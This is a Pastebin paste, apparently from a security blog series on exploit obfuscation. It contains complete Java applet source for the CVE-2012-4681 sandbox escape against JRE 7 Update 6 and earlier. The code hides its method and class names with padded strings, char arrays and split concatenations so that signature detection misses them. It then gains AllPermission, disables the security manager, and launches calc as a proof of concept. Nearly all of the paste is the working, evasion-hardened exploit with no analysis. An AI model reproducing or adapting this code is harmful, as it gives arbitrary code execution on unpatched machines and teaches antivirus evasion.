SHARE
TWEET

Java 7 Exploit CVE-2012-4681 obfuscation pt. 5/5

SecurityObscurity Nov 15th, 2012 1,525 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  *  Java 7 Exploit CVE-2012-4681 obfuscation pt. 5/5
  3.  *  
  4.  *  Affected product versions:
  5.  *  - JDK and JRE 7 Update 6 and before
  6.  *
  7.  * Post link: http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html
  8.  */
  9. import java.applet.Applet;
  10. import java.awt.Graphics;
  11. import java.beans.Expression;
  12. import java.beans.Statement;
  13. import java.lang.reflect.Field;
  14. import java.net.URL;
  15. import java.security.*;
  16. import java.security.cert.Certificate;
  17. import java.lang.reflect.Constructor;
  18. import java.lang.reflect.Method;
  19.  
  20. public class Java extends Applet
  21. {
  22.         // setSecurityManager
  23.     String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
  24.     // file
  25.     char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
  26.     // forName
  27.     String   ad = "or",me = "me", aw = "f", kl = "Na";
  28.     // getField
  29.     String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
  30.     // sun.awt.SunToolkit
  31.     String s = "sun", u = "awt", n = "SunToolkit", dot = ".";
  32.    
  33.     public void enableSecurity() throws Throwable
  34.     {
  35.         Object ao[] = new Object[2];
  36.         ao[0] = GimmeClass("java.beans.Statement");
  37.         ao[1] = "a"+"c"+"c";
  38.        
  39.         Expression e = new Expression(GimmeClass(new String(s+dot+u+dot+n)), field.replaceAll("\\d",""), ao);
  40.         e.execute();
  41.         Field field = (Field)e.getValue();
  42.  
  43.         Class alPerm = Class.forName("jav"+"a."+"sec"+"u"+"rit"+"y.A"+"ll"+"Perm"+"iss"+"ion");
  44.         Class perm   = GimmeClass("java.se"+"curi"+"ty.P"+"ermi"+"ssi"+"ons");
  45.         Object pe= perm.newInstance();
  46.         Method method = pe.getClass().getMethod("ad"+"d", GimmeClass("java."+"secu"+"rity"+".Per"+"mis"+"sion"));
  47.         method.invoke(pe, alPerm.newInstance());
  48.  
  49.         CodeSource cs = new CodeSource( new URL(new String(file)), new Certificate[0]);
  50.         ProtectionDomain pd = new ProtectionDomain(cs, (Permissions)pe);
  51.        
  52.         AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
  53.        
  54.         Class statClass = GimmeClass("ja"+"va."+"be"+"ans"+".S"+"tat"+"em"+"ent");
  55.         Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
  56.         Object stat = con.newInstance(GimmeClass("java.lan"+"g.S"+"ys"+"tem"),secMan.replaceAll("\\d",""), new Object[1]);
  57.         field.set(stat, ac);
  58.         Method m = stat.getClass().getMethod("ex"+"ecu"+"te");
  59.         m.invoke(stat);
  60.     }
  61.  
  62.     public void init()
  63.     {
  64.         try
  65.         {
  66.             enableSecurity();
  67.             Runtime.getRuntime().exec("calc");
  68.         }
  69.         catch(Throwable t){}
  70.     }
  71.    
  72.     private Class GimmeClass(String ps) throws Throwable
  73.     {
  74.         Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
  75.         le.execute();
  76.         return (Class)le.getValue();
  77.     }    
  78. }
RAW Paste Data
Top